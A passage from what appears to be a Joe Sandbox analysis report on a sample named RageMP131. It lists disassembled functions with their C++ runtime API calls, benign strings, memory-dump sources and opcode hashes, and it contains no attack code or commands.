Instruction Fuzzy Hash: 4011483360513426C62463BC7E5977E275A8B92B30F254239FC088B1C2DE7DD8828381

Function 00A1BACC Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00A60E00,00A0C023,00000002,00A0C023,00000000,?,?,?,00A1BBD6,00000000,?,00A0C023,00000002,00A60E00), ref: 00A1BB08

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1b808ba50bb86b51f809141ff6fc29d4e238aa5f67acb6726c6c06daf347689b
Instruction ID: d0e94ad34f38f776c0dc3ee5c9de0a1fcd8f0afad17afe8d8919d149cd9342c6
Opcode Fuzzy Hash: 1b808ba50bb86b51f809141ff6fc29d4e238aa5f67acb6726c6c06daf347689b
Instruction Fuzzy Hash: 2A0126326241586FCF09DF5ACC45CEE3B29EF81370B240208F8019B2D0EB71ED9187A0

Function 00A0CD02 Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00931FDE

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: b8f40caa4f1287907beefea8ca75fbb169b46d95453cf35e0fb1ecf872d8a719
Instruction ID: 7ae4b1cefa00fbafbc4b986ca6691264a6788130c874e9f00b253c23656013a1
Opcode Fuzzy Hash: b8f40caa4f1287907beefea8ca75fbb169b46d95453cf35e0fb1ecf872d8a719
Instruction Fuzzy Hash: F201D63551030DBBCB14ABA8FC019897BACDE01360B508636F914AB591FBB0E99087A1

Function 00A23E63 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00A0B16C,?,?,00A237E9,00000001,00000364,?,00000006,000000FF,?,00A0E0EB,?,?,?,?), ref: 00A23EA5

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a2c4f1c1fe5324af3bb33d6831e211f3803161533072772d16a1df13747c3dbb
Instruction ID: ce81eeea2c0c566e3c5723c7bf038c247e4dc11d1c6d24f235cb4322a98a00f7
Opcode Fuzzy Hash: a2c4f1c1fe5324af3bb33d6831e211f3803161533072772d16a1df13747c3dbb
Instruction Fuzzy Hash: FCF08933505535669F326B7A6905BAB77DBBF43760B174131FC0896180DB74EE0886E1

Function 00A2489D Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00A0E0EB,?,?,?,?,?,00932D8D,00A0B16C,?,?,00A0B16C), ref: 00A248CF

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 60d5849dc19cf9f4a58a4427c7915bd2793b8f8df9d0fa4e6cbd5ca2995901d9
Instruction ID: 2a2334a6ce5425cbecb4ef6a79c1a7fd8d8e88c26243a7a074b2587e9da8ad03
Opcode Fuzzy Hash: 60d5849dc19cf9f4a58a4427c7915bd2793b8f8df9d0fa4e6cbd5ca2995901d9
Instruction Fuzzy Hash: B4E09B321665B15AD621777DBD0179B77998F897B0F150231EC44B64D0DB61DC40C2E2

Function 054D041A Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1237bf61db026608b1143e569c25a21d2636027c215cf8770ca27bea1bdbb620
Instruction ID: 8e31309bb8a3c92b16d03c0536012cb3f546afc51be21f58a744ed2d45c0451a
Opcode Fuzzy Hash: 1237bf61db026608b1143e569c25a21d2636027c215cf8770ca27bea1bdbb620
Instruction Fuzzy Hash: CD0128A7148214AE9102C041563CBF2FA5FF282331F318667F84AD7541F295450B64B1

Function 054D0332 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb8ae83c30640eee53d2db6af7625c3cd1e2c2576b2588dc5fcc831fcec0fffe
Instruction ID: 328e2b2a714516ca37a95814431c4b60d06523ac90db12f44e7ffc594ec7446a
Opcode Fuzzy Hash: bb8ae83c30640eee53d2db6af7625c3cd1e2c2576b2588dc5fcc831fcec0fffe
Instruction Fuzzy Hash: 20F0287750C214EFD302E9A1845D9F9BE57BA83230F24817BF85E87502E2658156A632

Function 054D032B Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc94cd8e008f7db1bcb2e377dc32fffce8d2aea7d23e5655c837528007ea6d91
Instruction ID: adaef05500bceaa18f5565ed377263eac7a823d2d3dba15e9fcd80021c588dd0
Opcode Fuzzy Hash: cc94cd8e008f7db1bcb2e377dc32fffce8d2aea7d23e5655c837528007ea6d91
Instruction Fuzzy Hash: 01F0A7A704C110EF9342D591912D5F5FA07B646230F34C157B85F9B6026668865A9672

Function 054D036D Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427792cb8fe8bfd600ab86d2879804ddb3a6b50b6d98dce507c38da701b73038
Instruction ID: 0be5137866f802284e05ff18136bd32d002f681e07a710789593c2548f9fd7c0
Opcode Fuzzy Hash: 427792cb8fe8bfd600ab86d2879804ddb3a6b50b6d98dce507c38da701b73038
Instruction Fuzzy Hash: 23E0CD6715C200DB9342D261913D7F5FD47B742271F60815BA85FD75026568815AD533

Function 054D037C Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb197d6efc9d099d01672378935bda43f9c87c551ce8744a43d2990e7bc8f08c
Instruction ID: b441478873e1b452fdf0314776ecbfa7c0f4a359dd2c4c1789423c6423b0ddc3
Opcode Fuzzy Hash: cb197d6efc9d099d01672378935bda43f9c87c551ce8744a43d2990e7bc8f08c
Instruction Fuzzy Hash: 0BE07D2311C200DBD243DB31C02D5F5FA07F702134F24C617A48FD7903A959012A8A32

Function 054D039D Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b9df9c43ca279c35a2ae0b4593d79f27ad229c3509fb6c04feda0bfba7483e0
Instruction ID: 97570b40e1b34cf20ff026e78ca9c6554450508c9569fdb59e36761bf43b987e
Opcode Fuzzy Hash: 0b9df9c43ca279c35a2ae0b4593d79f27ad229c3509fb6c04feda0bfba7483e0
Instruction Fuzzy Hash: EFD02B7304D100D78202E661801E7F5F947B702161F108147B49B97D436A580196D573

Function 054D03B1 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.3931161711.00000000054D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_54d0000_RageMP131.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c184d33bb3871fc71d3f379f99f0190d904bee9bded608a845b9706391dbaf1
Instruction ID: f80810c01c610b346e8eb89083bde1ecad12654a77e476e36c4d42eb82de3356
Opcode Fuzzy Hash: 7c184d33bb3871fc71d3f379f99f0190d904bee9bded608a845b9706391dbaf1
Instruction Fuzzy Hash: 68D02EA3849348638243E1A1527E3F2EC4B57071A5F2081A3AC06BBA83B18A0626D1B2

Non-executed Functions

Function 0099AE90 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0099AEB3
std::_Lockit::_Lockit.LIBCPMT ref: 0099AED5
std::_Lockit::~_Lockit.LIBCPMT ref: 0099AEF5
std::_Lockit::~_Lockit.LIBCPMT ref: 0099AF1F
std::_Lockit::_Lockit.LIBCPMT ref: 0099AF8D
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0099AFD9
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0099AFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 0099B088
std::_Facet_Register.LIBCPMT ref: 0099B095

Strings

bad locale name, xrefs: 0099B0AF

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 3375549084-1405518554
Opcode ID: 582b8fe6cc52ea613fb49786fdf712eb4a2a28afb2c390c8171d731c14d40826
Instruction ID: dcadba69b9993ae2338465ab038bf2a9f549567087d7ac217fdf9f5523c895b7
Opcode Fuzzy Hash: 582b8fe6cc52ea613fb49786fdf712eb4a2a28afb2c390c8171d731c14d40826
Instruction Fuzzy Hash: 0B6172B1D00248DBDF21DFA8DA85BDEBBB8EF14350F144059E805A7381EB74D909CBA2

Function 00933770 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 009337E9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00933835
__Getctype.LIBCPMT ref: 0093384E
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0093386A
std::_Lockit::~_Lockit.LIBCPMT ref: 009338FF

Strings

bad locale name, xrefs: 0093391C

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1840309910-1405518554
Opcode ID: 10059118c0a6aba6cd644448cf075fa605d5f926934b6115ab1cb62352bc4ca0
Instruction ID: c5dd6c29998b9dd84f18a17b96cf4ddf2c6f45e10717c6abd247a8d0a2bcba86
Opcode Fuzzy Hash: 10059118c0a6aba6cd644448cf075fa605d5f926934b6115ab1cb62352bc4ca0
Instruction Fuzzy Hash: CB5151F1D00248DBDF10DFA4D9857DEFBB8AF14314F148169F805AB281E775AA48CBA2

Function 00A10880 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A108B7
___except_validate_context_record.LIBVCRUNTIME ref: 00A108BF
_ValidateLocalCookies.LIBCMT ref: 00A10948
__IsNonwritableInCurrentImage.LIBCMT ref: 00A10973
_ValidateLocalCookies.LIBCMT ref: 00A109C8

Strings

csm, xrefs: 00A1095D

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: b6f477e55abd48421dea29b616dbf7a1f8756918f02b7bb5130130cd59dfd102
Instruction ID: 2ef71deb27197413cb8c016b88c1e446dbc82979b6057c8188e728e4c483d558
Opcode Fuzzy Hash: b6f477e55abd48421dea29b616dbf7a1f8756918f02b7bb5130130cd59dfd102
Instruction Fuzzy Hash: 1541C034A00209ABCF10DF68C990EEEBBB5BF44364F148055F9189B392D7B1EAC5CB90

Function 00999520 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00999543
std::_Lockit::_Lockit.LIBCPMT ref: 00999566
std::_Lockit::~_Lockit.LIBCPMT ref: 00999586
std::_Facet_Register.LIBCPMT ref: 009995FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00999613
Concurrency::cancel_current_task.LIBCPMT ref: 0099962B

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: c4848757745c735b06f6496e7c5cc19c6336520b40ceed2402de96926b97a01c
Instruction ID: d4fc84f6b5a81a53902ff5a7918628eadb1e8ac5f193a5ab750d287385e041e3
Opcode Fuzzy Hash: c4848757745c735b06f6496e7c5cc19c6336520b40ceed2402de96926b97a01c
Instruction Fuzzy Hash: D741CE71D002199FCF11EF9CE941AAEBBB8FB41324F154619E805AB391DB70AE45CBE1

Function 00935DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 009360F2
___std_exception_destroy.LIBVCRUNTIME ref: 0093617F
___std_exception_copy.LIBVCRUNTIME ref: 00936248

Strings

recursive_directory_iterator::operator++, xrefs: 009361CC

Memory Dump Source

Source File: 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00930000, based on PE: true

Associated: 00000011.00000002.3909371628.0000000000930000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909493292.0000000000A63000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3909976006.0000000000A67000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000A7A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000C07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000CF3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D2F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D36000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3910001656.0000000000D46000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3921781802.0000000000D47000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923692041.0000000000F03000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923782795.0000000000F04000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923823758.0000000000F07000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000011.00000002.3923866312.0000000000F08000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_930000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: c652191de9160b7f25a51a5cb38645dc9c5452714bdd77177965d53bf3002cd2
Instruction ID: cea32b4e7d8f7b20593da52d5a68196bf8d031e78eca281c14632985f0051cef
Opcode Fuzzy Hash: c652191de9160b7f25a51a5cb38645dc9c5452714bdd77177965d53bf3002cd2
Instruction Fuzzy Hash: B7E1FFB0900604AFDB28DF68D945B9EF7F9FF48700F108A1DE45697681E774AA48CFA1

Function 009384C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 009386DE
___std_exception_destroy.LIBVCRUNTIME ref: 009386ED

Strings

, column , xrefs: 00938555, 0093856B
at line , xrefs: 00938518

Memory Dump Source

